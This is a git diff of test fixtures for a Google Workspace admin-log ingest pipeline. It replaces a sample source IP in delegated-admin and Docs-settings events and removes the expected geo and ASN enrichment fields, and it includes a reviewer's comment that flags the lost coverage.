-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"CREATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"DELETE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"ADD_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} 
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"REMOVE_PRIVILEGE","parameters":[{"name":"PRIVILEGE_NAME","value":"privilege"},{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"RENAME_ROLE","parameters":[{"name":"NEW_VALUE","value":"new"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UPDATE_ROLE","parameters":[{"name":"ROLE_ID","value":"1234"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DELEGATED_ADMIN_SETTINGS","name":"UNASSIGN_ROLE","parameters":[{"name":"ORG_UNIT_NAME","value":"org"},{"name":"ROLE_NAME","value":"_DIRECTORY_SYNC_ADMIN_ROLE"},{"name":"USER_EMAIL","value":"user@example.com"}]}} 
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json index 5bdc8a1bb5a..eeb8e6f93f2 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json +++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-delegatedadmin.log-expected.json @@ -10,7 +10,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -34,35 +34,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697363200Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", + "ingested": "2021-12-09T13:38:30.493568900Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}", "provider": "admin", "action": "ASSIGN_ROLE", "id": "1", @@ -92,7 +74,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
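Review bot: Same concern for the delegated-admin expectations as elsewhere in this change: the 35-to-17 line hunk here drops the whole `source.geo`/`source.as` enrichment for `67.43.156.13` rather than updating it, so `ASSIGN_ROLE` and the following role/privilege events are no longer checked for geo or ASN fields. Since these are the privileged-action events a detection engineer is most likely to pivot on by location or ASN, losing that assertion silently is a coverage regression; please confirm the expected files were generated against a stack with the test GeoIP database, or regenerate them so the subset's geo/AS values appear on the new side. Only the `source.ip` and `related.ip` substitutions in this hunk look intentional.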
@@ -116,35 +98,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697388700Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493582300Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"CREATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "CREATE_ROLE", "id": "1", @@ -174,7 +138,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -198,35 +162,17 @@ "id": "1" }, "source": { - "geo": { - "continent_name": "North America", - "region_iso_code": "US-PA", - "city_name": "State College", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Pennsylvania", - "location": { - "lon": -77.8618, - "lat": 40.7957 - } - }, - "as": { - "number": 7922, - "organization": { - "name": "Comcast Cable Communications, LLC" - } - }, "user": { "name": "foo", "id": "1", "email": "foo@bar.com", "domain": "bar.com" }, - "ip": "98.235.162.24" + "ip": "67.43.156.13" }, "event": { - "ingested": "2021-06-09T10:57:19.697393800Z", - "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", + "ingested": "2021-12-09T13:38:30.493587Z", + "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"DELETE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}", "provider": "admin", "action": "DELETE_ROLE", "id": "1", @@ -256,7 +202,7 @@ "foo" ], "ip": [ - "98.235.162.24" + "67.43.156.13" ] }, "google_workspace": { 
@@ -280,35 +226,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.697397500Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+ "ingested": "2021-12-09T13:38:30.493593800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"ADD_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
 "provider": "admin",
 "action": "ADD_PRIVILEGE",
 "id": "1",
@@ -338,7 +266,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -362,35 +290,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.697400800Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+ "ingested": "2021-12-09T13:38:30.493598900Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"REMOVE_PRIVILEGE\",\"parameters\":[{\"name\":\"PRIVILEGE_NAME\",\"value\":\"privilege\"},{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
 "provider": "admin",
 "action": "REMOVE_PRIVILEGE",
 "id": "1",
@@ -420,7 +330,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -442,35 +352,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.697404100Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+ "ingested": "2021-12-09T13:38:30.493603800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"RENAME_ROLE\",\"parameters\":[{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
 "provider": "admin",
 "action": "RENAME_ROLE",
 "id": "1",
@@ -500,7 +392,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -524,35 +416,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.697407300Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
+ "ingested": "2021-12-09T13:38:30.493607800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UPDATE_ROLE\",\"parameters\":[{\"name\":\"ROLE_ID\",\"value\":\"1234\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"}]}}",
 "provider": "admin",
 "action": "UPDATE_ROLE",
 "id": "1",
@@ -582,7 +456,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -606,35 +480,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.697410400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:30.493613100Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DELEGATED_ADMIN_SETTINGS\",\"name\":\"UNASSIGN_ROLE\",\"parameters\":[{\"name\":\"ORG_UNIT_NAME\",\"value\":\"org\"},{\"name\":\"ROLE_NAME\",\"value\":\"_DIRECTORY_SYNC_ADMIN_ROLE\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
 "action": "UNASSIGN_ROLE",
 "id": "1",
diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log
index c3166fb87d2..9136bf3801f 100644
--- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log
@@ -1,3 +1,3 @@
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}}
-{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"98.235.162.24","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}}
+{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"TRANSFER_DOCUMENT_OWNERSHIP","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"DRIVE_DATA_RESTORE","parameters":[{"name":"BEGIN_DATE_TIME","value":"2002-10-02T12:00:00Z"},{"name":"END_DATE_TIME","value":"2002-10-02T15:00:00Z"},{"name":"USER_EMAIL","value":"user@example.com"}]}} +{"kind":"admin#reports#activity","id":{"time":"2020-10-02T15:00:00Z","uniqueQualifier":1,"applicationName":"admin","customerId":"1"},"actor":{"callerType":"USER","email":"foo@bar.com","profileId":1},"ownerDomain":"elastic.com","ipAddress":"67.43.156.13","events":{"type":"DOCS_SETTINGS","name":"CHANGE_DOCS_SETTING","parameters":[{"name":"DOMAIN_NAME","value":"example.com"},{"name":"GROUP_EMAIL","value":"group@example.com"},{"name":"NEW_VALUE","value":"new"},{"name":"OLD_VALUE","value":"old"},{"name":"ORG_UNIT_NAME","value":"org"},{"name":"SETTING_NAME","value":"setting"}]}} diff --git a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json index 2b667d988e1..16011376136 100644 --- a/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json 
+++ b/packages/google_workspace/data_stream/admin/_dev/test/pipeline/test-admin-docs.log-expected.json
@@ -10,7 +10,7 @@
 "foo"
 ],
 "ip": [
- "98.235.162.24"
+ "67.43.156.13"
 ]
 },
 "google_workspace": {
@@ -34,35 +34,17 @@
 "id": "1"
 },
 "source": {
- "geo": {
- "continent_name": "North America",
- "region_iso_code": "US-PA",
- "city_name": "State College",
- "country_iso_code": "US",
- "country_name": "United States",
- "region_name": "Pennsylvania",
- "location": {
- "lon": -77.8618,
- "lat": 40.7957
- }
- },
- "as": {
- "number": 7922,
- "organization": {
- "name": "Comcast Cable Communications, LLC"
- }
- },
 "user": {
 "name": "foo",
 "id": "1",
 "email": "foo@bar.com",
 "domain": "bar.com"
 },
- "ip": "98.235.162.24"
+ "ip": "67.43.156.13"
 },
 "event": {
- "ingested": "2021-06-09T10:57:19.984912400Z",
- "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"98.235.162.24\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
+ "ingested": "2021-12-09T13:38:31.510411800Z",
+ "original": "{\"kind\":\"admin#reports#activity\",\"id\":{\"time\":\"2020-10-02T15:00:00Z\",\"uniqueQualifier\":1,\"applicationName\":\"admin\",\"customerId\":\"1\"},\"actor\":{\"callerType\":\"USER\",\"email\":\"foo@bar.com\",\"profileId\":1},\"ownerDomain\":\"elastic.com\",\"ipAddress\":\"67.43.156.13\",\"events\":{\"type\":\"DOCS_SETTINGS\",\"name\":\"TRANSFER_DOCUMENT_OWNERSHIP\",\"parameters\":[{\"name\":\"DOMAIN_NAME\",\"value\":\"example.com\"},{\"name\":\"NEW_VALUE\",\"value\":\"new\"},{\"name\":\"USER_EMAIL\",\"value\":\"user@example.com\"}]}}",
 "provider": "admin",
